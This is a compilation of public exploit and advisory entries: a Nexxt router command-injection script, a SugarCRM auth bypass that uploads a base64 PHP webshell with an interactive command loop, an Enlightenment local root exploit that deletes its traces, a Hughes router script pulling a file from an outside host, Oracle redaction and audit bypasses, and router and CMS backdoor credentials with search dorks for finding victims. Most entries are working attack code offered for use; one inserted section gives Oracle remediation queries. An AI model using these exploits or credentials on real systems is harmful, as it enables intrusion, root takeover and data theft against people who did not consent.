<pre><code># Exploit Title: Nexxt Router Firmware 42.103.1.5095 - Remote Code Execution (RCE) (Authenticated)<br /># Date: 19/10/2022<br /># Exploit Author: Yerodin Richards<br /># Vendor Homepage: https://www.nexxtsolutions.com/<br /># Version: 42.103.1.5095<br /># Tested on: ARN02304U8<br /># CVE : CVE-2022-44149<br /><br />import requests<br />import base64<br /><br />router_host = "http://192.168.1.1"<br />username = "admin"<br />password = "admin"<br /><br /><br />def main():<br /> send_payload("&telnetd")<br /> print("connect to router using: `telnet "+router_host.split("//")[1]+ "` using known credentials")<br /> pass<br /><br />def gen_header(u, p):<br /> return base64.b64encode(f"{u}:{p}".encode("ascii")).decode("ascii")<br /><br />def send_payload(payload):<br /> url = router_host+"/goform/sysTools"<br /> headers = {"Authorization": "Basic {}".format(gen_header(username, password))}<br /> params = {"tool":"0", "pingCount":"4", "host": payload, "sumbit": "OK"}<br /> requests.post(url, headers=headers, data=params)<br /><br /><br />if __name__ == '__main__':<br /> main()<br /></code></pre>
<pre><code>Title: Bypassing DBMS_REDACT Dynamic Data Masking security feature in Oracle database system<br />Product: Database<br />Manufacturer: Oracle<br />Affected Version(s): 19c, 21c<br />Tested Version(s): 19c, 21c<br />CVE Reference: N/A<br />Author of Advisory: Emad Al-Mousa<br /><br />Overview:<br /><br />The DBMS_REDACT package provides an interface to Oracle Data Redaction, which enables you to mask (redact) data that is returned from SQL queries. Basically, it is dynamic data masking: security policies are configured and enabled through the DBMS_REDACT package.<br /><br />This is a security feature, but it does not provide bulletproof data protection, as I will demonstrate how easily it can be bypassed and masked data can be extracted/viewed.<br /><br />**************************************************<br />Proof of Concept (PoC):<br />In the database I will create a table called HR.TABLE2, create an index on the SALES column and insert dummy rows.<br /><br />SQL> CREATE TABLE HR.TABLE2( COMPANY_NAME VARCHAR2(10 BYTE), REGION VARCHAR2(10 BYTE), SALES NUMBER(12), DIVISION_NAME VARCHAR2(12));<br />SQL> CREATE INDEX HR.IDX_TABLE2_SALES ON HR.TABLE2(SALES);<br /><br />SQL> Insert into HR.TABLE2 values ('COMPANY_A','EU',120000000,'INDUSTRIAL');<br />SQL> Insert into HR.TABLE2 values ('COMPANY_B','ASIA',170000000,'RETAIL');<br />SQL> Insert into HR.TABLE2 values ('COMPANY_C','ME',40000000,'SHIPMENT');<br />SQL> Insert into HR.TABLE2 values ('COMPANY_D','AFRICA',11000000,'FARMING');<br />SQL> Insert into HR.TABLE2 values ('COMPANY_E','LATIN-AM',114000000,'SHIPMENT');<br />SQL> Insert into HR.TABLE2 values ('COMPANY_F','NORTH-AM',190000000,'RETAIL');<br />SQL> commit;<br /><br />I will create a redaction policy as the SYS user against the "SALES" column in the table HR.TABLE2:<br />sqlplus / as sysdba<br />SQL> begin<br />  dbms_redact.add_policy(<br />    object_schema => 'HR',<br />    object_name   => 'TABLE2',<br />    column_name   => 'SALES',<br />    policy_name   => 'REDACT_HR_SALES',<br />    function_type => DBMS_REDACT.FULL,<br />    expression    => '1=1');<br />end;<br />/<br /><br />I will create a user called "roro" in the pluggable database ORCLPDB1 with "create session" and "SELECT" permission ONLY on the table:<br />sqlplus / as sysdba<br />SQL> alter session set container=ORCLPDB1;<br />SQL> create user roro identified by dummy_123;<br />SQL> grant select on HR.TABLE2 to roro;<br /><br />Connect to the database with the roro account using "SQL Developer Tool" or SQLcl and execute the following command:<br />info+ HR.TABLE2;<br /><br />The histogram data for the SALES column will show the actual values stored in the redacted column.<br />Conclusion: So the security feature was bypassed with no excessive privileges required to be granted to the database account; I utilized the info+ command only.<br /><br />**************************************************<br />References:<br />https://docs.oracle.com/database/121/ASOAG/introduction-to-oracle-data-redaction.htm#ASOAG852<br />https://databasesecurityninja.wordpress.com/2023/01/03/bypassing-dbms_redact-dynamic-data-masking-security-feature-in-oracle-database-system/<br /><br />Thanks, Emad<br /></code></pre>
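A defender's follow-up to the advisory above, added here and not part of Emad Al-Mousa's write-up: the exposure path is optimizer statistics, which a SELECT-only user can read through ALL_TAB_COL_STATISTICS and ALL_TAB_HISTOGRAMS and which Data Redaction does not cover. The block assumes the HR.TABLE2 / REDACT_HR_SALES setup from the PoC and is run as a DBA; the METHOD_OPT preference and the LOW_VALUE/HIGH_VALUE caveat are my own remediation choices, not something the advisory states.

```sql
-- Added defensive check (not from the advisory). Assumes HR.TABLE2 with the
-- REDACT_HR_SALES policy from the PoC exists and this is run as a DBA.

-- 1. Which redacted columns currently carry a histogram? Histogram bucket
--    endpoints are plaintext copies of real column values, and redaction
--    policies only rewrite query results, not the data dictionary.
SELECT r.object_owner, r.object_name, r.column_name, r.function_type,
       s.histogram, s.num_buckets, s.last_analyzed
  FROM redaction_columns r
  JOIN dba_tab_col_statistics s
    ON s.owner = r.object_owner
   AND s.table_name = r.object_name
   AND s.column_name = r.column_name
 WHERE s.histogram <> 'NONE';

-- 2. What the SELECT-only account can see for HR.TABLE2.SALES through the
--    ALL_* views (this is the data that "info+" renders). Run as roro to
--    confirm the exposure: ENDPOINT_VALUE holds real SALES figures.
SELECT endpoint_number, endpoint_value, endpoint_actual_value
  FROM all_tab_histograms
 WHERE owner = 'HR' AND table_name = 'TABLE2' AND column_name = 'SALES'
 ORDER BY endpoint_number;

-- 3. Remediation: drop the column-level statistics on the redacted column and
--    pin a table preference so the automatic statistics job does not rebuild
--    histograms on this table ("SIZE 1" = one bucket = no histogram).
BEGIN
  DBMS_STATS.DELETE_COLUMN_STATS(ownname => 'HR',
                                 tabname => 'TABLE2',
                                 colname => 'SALES');
  DBMS_STATS.SET_TABLE_PREFS(ownname => 'HR',
                             tabname => 'TABLE2',
                             pname   => 'METHOD_OPT',
                             pvalue  => 'FOR ALL COLUMNS SIZE 1');
  DBMS_STATS.GATHER_TABLE_STATS(ownname => 'HR', tabname => 'TABLE2');
END;
/

-- 4. Verify: SALES should now report HISTOGRAM = 'NONE'.
--    Caveat: even without a histogram, LOW_VALUE/HIGH_VALUE still hold the
--    column's minimum and maximum. If the boundary values themselves are
--    sensitive, keep the column statistics deleted and lock them
--    (DBMS_STATS.LOCK_TABLE_STATS), or grant SELECT on a view instead of
--    the base table so the *_TAB_* dictionary rows are not visible at all.
SELECT column_name, histogram, num_buckets, low_value, high_value
  FROM dba_tab_col_statistics
 WHERE owner = 'HR' AND table_name = 'TABLE2' AND column_name = 'SALES';
```

Step 1 is the recurring audit query: schedule it so any newly added redaction policy whose column later picks up a histogram is flagged before a low-privileged account can read the endpoints.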
<pre><code>Title: CVE-2021-35576 – Oracle database system Unified Audit Policy Bypass<br />Product: Database<br />Manufacturer: Oracle<br />Affected Version(s): 12.1.0.2, 12.2.0.1, 19c<br />Tested Version(s): 19c<br />Risk Level: low<br />Solution Status: Fixed<br />Manufacturer Notification: 2021-03-17<br />Solution Date: 2021-10-17<br />Public Disclosure: 2022-06-11<br />CVE Reference: CVE-2021-35576<br />Author of Advisory: Emad Al-Mousa<br /><br />Overview:<br />Oracle Database is a general purpose relational database management system (RDBMS).<br />Unified Auditing is the supported mechanism to capture database audit logs. The unified audit trail captures audit information from a variety of sources. The unified audit trail, which resides in a read-only table in the AUDSYS schema in the SYSAUX tablespace, makes this information available in a uniform format in the UNIFIED_AUDIT_TRAIL data dictionary view, and is available in both single-instance and Oracle Database Real Application Clusters environments. In addition to the user SYS, users who have been granted the AUDIT_ADMIN and AUDIT_VIEWER roles can query these views. If your users only need to query the views but not create audit policies, then grant them the AUDIT_VIEWER role.<br /><br /><br />*****************************************<br />Vulnerability Details:<br />The vulnerability allows a database administrator or system admin with access to the database server (either local login or remote authentication) to bypass a custom in-place audit policy defined in the Oracle database system. Moreover, setting the database in upgrade mode will disable auditing, and a threat actor can perform malicious operations without detection.<br /><br />*****************************************<br />Proof of Concept (PoC):<br />I will create a table in pluggable database PDB1 under the HR schema and insert a few records:<br />SQL> CREATE TABLE HR.EMPLOYEE<br />(<br />  FIRST_NAME VARCHAR2(50),<br />  LAST_NAME VARCHAR2(50)<br />);<br />SQL> INSERT INTO HR.EMPLOYEE (<br />  FIRST_NAME, LAST_NAME)<br />VALUES ( 'EMAD','MOUSA' );<br />SQL> commit;<br /><br /><br />SQL> INSERT INTO HR.EMPLOYEE (<br />  FIRST_NAME, LAST_NAME)<br />VALUES ( 'SAMI','MOUSA' );<br />SQL> commit;<br />I will now create an audit policy:<br />SQL> CREATE AUDIT POLICY SELECT_P1 actions select on HR.EMPLOYEE;<br />SQL> audit policy SELECT_P1;<br />To check the audit policies configured in the PDB1 database:<br />SQL> SELECT * FROM audit_unified_enabled_policies;<br /><br />Now, let us simulate executing the select statement against the monitored/audited table while the database is in upgrade mode:<br />sqlplus / as sysdba<br />SQL> alter session set container=PDB1;<br />SQL> shutdown immediate;<br />SQL> startup upgrade;<br />SQL> select * from HR.EMPLOYEE;<br />SQL> startup force;<br />SQL> exec SYS.DBMS_AUDIT_MGMT.FLUSH_UNIFIED_AUDIT_TRAIL;<br /><br /><br />Checking the audit logs using the query below, NO entry is found recorded in the unified audit trail:<br /><br />SQL> select OS_USERNAME,USERHOST,DBUSERNAME,CLIENT_PROGRAM_NAME,EVENT_TIMESTAMP,ACTION_NAME,OBJECT_SCHEMA,OBJECT_NAME,SQL_TEXT from unified_audit_trail where OBJECT_NAME='EMPLOYEE' order by EVENT_TIMESTAMP desc;<br />So, even though an audit policy was configured in the database, a DBA/System Admin can view the audited sensitive table without a trace, as no record will be populated in the UNIFIED_AUDIT_TRAIL view!<br />*****************************************<br />References:<br />https://www.oracle.com/security-alerts/cpuoct2021.html<br />https://databasesecurityninja.wordpress.com/2022/06/11/cve-2021-35576-bypassing-unified-audit-policy/<br />https://nvd.nist.gov/vuln/detail/CVE-2021-35576<br /><br />Credit:<br />Emad Al-Mousa: CVE-2021-35576<br /></code></pre>
<pre><code>#!/usr/bin/env python<br />#<br /># SugarCRM 0-day Auth Bypass + RCE Exploit<br />#<br /># Dorks:<br /># https://www.google.com/search?q=site:sugarondemand.com&filter=0<br /># https://www.google.com/search?q=intitle:"SugarCRM"+inurl:index.php<br /># https://www.shodan.io/search?query=http.title:"SugarCRM"<br /># https://search.censys.io/search?resource=hosts&q=services.http.response.html_title:"SugarCRM"<br /># https://search.censys.io/search?resource=hosts&q=services.http.response.headers.content_security_policy:"*.sugarcrm.com"<br /><br />import base64, re, requests, sys, uuid<br /><br />requests.packages.urllib3.disable_warnings()<br /><br />if len(sys.argv) != 2:<br />    sys.exit("Usage: %s [URL]" % sys.argv[0])<br /><br />print "[+] Sending authentication request"<br /><br />url = sys.argv[1] + "/index.php"<br />session = {"PHPSESSID": str(uuid.uuid4())}<br />params = {"module": "Users", "action": "Authenticate", "user_name": 1, "user_password": 1}<br /><br />requests.post(url, cookies=session, data=params, verify=False)<br /><br />print "[+] Uploading PHP shell\n"<br /><br />png_sh = "iVBORw0KGgoAAAANSUhEUgAAABkAAAAUCAMAAABPqWaPAAAAS1BMVEU8P3BocCBlY2hvICIjIyMjIyI7IHBhc3N0aHJ1KGJhc2U2NF9kZWNvZGUoJF9QT1NUWyJjIl0pKTsgZWNobyAiIyMjIyMiOyA/PiD2GHg3AAAACXBIWXMAAA7EAAAOxAGVKw4bAAAAKklEQVQokWNgwA0YmZhZWNnYOTi5uHl4+fgFBIWERUTFxCXwaBkFQxQAADC+AS1MHloSAAAAAElFTkSuQmCC"<br />upload = {"file": ("sweet.phar", base64.b64decode(png_sh), "image/png")} # you can also try with other extensions like .php7 .php5 or .phtml<br />params = {"module": "EmailTemplates", "action": "AttachFiles"}<br /><br />requests.post(url, cookies=session, data=params, files=upload, verify=False)<br /><br />url = sys.argv[1] + "/cache/images/sweet.phar"<br /><br />while True:<br />    cmd = raw_input("# ")<br />    res = requests.post(url, data={"c": base64.b64encode(cmd)}, verify=False)<br />    res = re.search("#####(.*)#####", res.text, re.DOTALL)<br />    if res:<br />        print res.group(1)<br />    else:<br />        sys.exit("\n[+] Failure!\n")<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : BDWeb-Link Lms v1.11.5 SQL Injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit) | <br />| # Vendor : https://bdweblink.com | <br />| # Dork : Developed by Developed by BD Web Link |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] http://127.0.0.1/single-page.php?id=71 <====| inject here<br /><br />[+] https://127.0.0.1/Dashboard <====| Login<br /><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code><br />Hughes Satellite Router Remote File Inclusion Cross-Frame Scripting<br /><br /><br />Vendor: Hughes Network Systems, LLC<br />Product web page: https://www.hughes.com<br />Affected version: HX200 v8.3.1.14<br />                  HX90 v6.11.0.5<br />                  HX50L v6.10.0.18<br />                  HN9460 v8.2.0.48<br />                  HN7000S v6.9.0.37<br /><br />Summary: The HX200 is a high-performance satellite router designed to<br />provide carrier-grade IP services using dynamically assigned high-bandwidth<br />satellite IP connectivity. The HX200 satellite router provides flexible<br />Quality of Service (QoS) features that can be tailored to the network<br />applications at each individual remote router, such as Adaptive Constant<br />Bit Rate (CBR) bandwidth assignment to deliver high-quality, low jitter<br />bandwidth for real-time traffic such as Voice over IP (VoIP) or videoconferencing.<br />With integrated IP features including RIPv1, RIPv2, BGP, DHCP, NAT/PAT,<br />and DNS Server/Relay functionality, together with a high-performance<br />satellite modem, the HX200 is a full-featured IP Router with an integrated<br />high-performance satellite router. The HX200 enables high-performance<br />IP connectivity for a variety of applications including cellular backhaul,<br />MPLS extension services, virtual leased line, mobile services and other<br />high-bandwidth solutions.<br /><br />Desc: The router contains a cross-frame scripting via remote file inclusion<br />vulnerability that may potentially be exploited by malicious users to compromise<br />an affected system. This vulnerability may allow an unauthenticated malicious<br />user to misuse frames, include JS/HTML code and steal sensitive information<br />from legitimate users of the application.<br /><br />Tested on: WindWeb/1.0<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />                            @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5743<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5743.php<br /><br /><br />23.12.2022<br /><br />--<br /><br /><br />snippet:///XFSRFI<br />//<br />// Hughes Satellite Router RFI/XFS PoC Exploit<br />// by lqwrm 2022<br />//<br /><br />//URL http://TARGET/fs/dynaform/speedtest.html<br />//Reload target<br />//window.location.reload()<br /><br />console.log("Loading Broadband Satellite Browsing Test");<br /><br />//Add cross-frame file include (http only)<br />AddURLtoList("http://www.zeroscience.mk/pentest/XSS.svg");<br /><br />console.log("Calling StartTest()");<br />StartTest();<br /><br />//console.log("Calling DoTest()");<br />//DoTest()<br /><br />//Unload weapon<br />//document.getElementById("URLList").remove();<br /></code></pre>
<pre><code># Exploit Title: Router backdoor - ProLink PRS1841 PLDT Home fiber<br /># Exploit Author: Lawrence Amer @zux0x3a<br /># Vendor Homepage: https://prolink2u.com/product/prs1841/<br /># Firmware : PRS1841 U V2<br /># reference: https://0xsp.com/security%20research%20%20development%20srd/backdoor-discovered-in-pldt-home-fiber-routers/<br /><br />Description<br />========================<br />A silent privileged backdoor account was discovered on the Prolink PRS1841 <br />routers; it allows attackers to gain command execution privileges on the <br />router OS.<br /><br />The vulnerable account shipped by the vendor was identified as "adsl", with <br />"realtek" as the default password; attackers could use this account to <br />access the router remotely or from the internal network using either the Telnet or FTP <br />protocol.<br /><br />PoC<br />=============================<br />adsl:$1$$m9g7v7tSyWPyjvelclu6D1:0:0::/tmp:/bin/cli<br /><br /></code></pre>
<pre><code>## Title: Enlightenment Version: 0.25.3 LPE<br />## Author: nu11secur1ty<br />## Date: 12.26.2022<br />## Vendor: https://www.enlightenment.org/<br />## Software: https://www.enlightenment.org/download<br />## Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706<br /><br />## Description:<br />Enlightenment Version 0.25.3 is vulnerable to local privilege escalation.<br />enlightenment_sys in Enlightenment before 0.25.4 allows local users to<br />gain privileges because it is setuid root,<br />and the system library function mishandles pathnames that begin with a<br />/dev/.. substring.<br />If the attacker has local access to a machine on which<br />Enlightenment is installed,<br />he can use this vulnerability to do very dangerous stuff.<br /><br />## STATUS: CRITICAL Vulnerability<br /><br />## Tested on:<br />```bash<br />DISTRIB_ID=Ubuntu<br />DISTRIB_RELEASE=22.10<br />DISTRIB_CODENAME=kinetic<br />DISTRIB_DESCRIPTION="Ubuntu 22.10"<br />PRETTY_NAME="Ubuntu 22.10"<br />NAME="Ubuntu"<br />VERSION_ID="22.10"<br />VERSION="22.10 (Kinetic Kudu)"<br />VERSION_CODENAME=kinetic<br />ID=ubuntu<br />ID_LIKE=debian<br />HOME_URL="https://www.ubuntu.com/"<br />SUPPORT_URL="https://help.ubuntu.com/"<br />BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"<br />PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"<br />UBUNTU_CODENAME=kinetic<br />LOGO=ubuntu-logo<br />```<br /><br />[+] Exploit:<br /><br />```bash<br />#!/usr/bin/bash<br /># Idea by MaherAzzouz<br /># Development by nu11secur1ty<br /><br />echo "CVE-2022-37706"<br />echo "[*] Trying to find the vulnerable SUID file..."<br />echo "[*] This may take a few seconds..."<br /><br /># The actual problem: the setuid enlightenment_sys binary<br />file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)<br />if [[ -z ${file} ]]<br />then<br />    echo "[-] Couldn't find the vulnerable SUID file..."<br />    echo "[*] Enlightenment should be installed on your system."<br />    exit 1<br />fi<br /><br />echo "[+] Vulnerable SUID binary found!"<br />echo "[+] Trying to pop a root shell!"<br />mkdir -p /tmp/net<br />mkdir -p "/dev/../tmp/;/tmp/exploit"<br /><br />echo "/bin/sh" > /tmp/exploit<br />chmod a+x /tmp/exploit<br />echo "[+] Welcome to the rabbit hole :)"<br /><br /># The mount path begins with /dev/.. and is passed to the setuid helper on one line<br />${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net<br /><br />read -p "Press any key to clean the evidence..."<br />echo -e "Please wait... "<br /><br />sleep 5<br />rm -rf /tmp/exploit<br />rm -rf /tmp/net<br />echo -e "Done; Everything is clear ;)"<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706)<br />## Proof and Exploit:<br />[href](https://streamable.com/zflbgg)<br /><br />## Time spent<br />`01:00:00`<br /><br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : COURIER DEPRIXA V2.5 Backdoor Account Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit) | <br />| # Vendor : https://www.themeslide.com/courier-deprixa-logistics-worldwide-v2-5/ | <br />| # Dork : |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] Use Payload : user=admin & pass=09731 <br /><br />[+] https://deprixalogistics.online/dashboard/<br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>=======================================================================================================================================================================================<br />| # Title : consultine consulting business and finance website cms v1.8 Backdoor Account Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit) | <br />| # Vendor : https://codecanyon.net/item/consultine-consulting-business-and-finance-website-cms/22236735 | <br />| # Dork : About Us Lorem ipsum dolor sit amet, omnis signiferumque in mei, mei ex enim concludaturque. Senserit salutandi euripidis no per, modus maiestatis scribentur est an.|<br />=======================================================================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] Use Payload : user=admin@gmail.com & pass=1234 <br /><br />[+] https://www.seusite.top/jornal/admin/<br /><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | <br /> |<br />=======================================================================================================================================<br /></code></pre>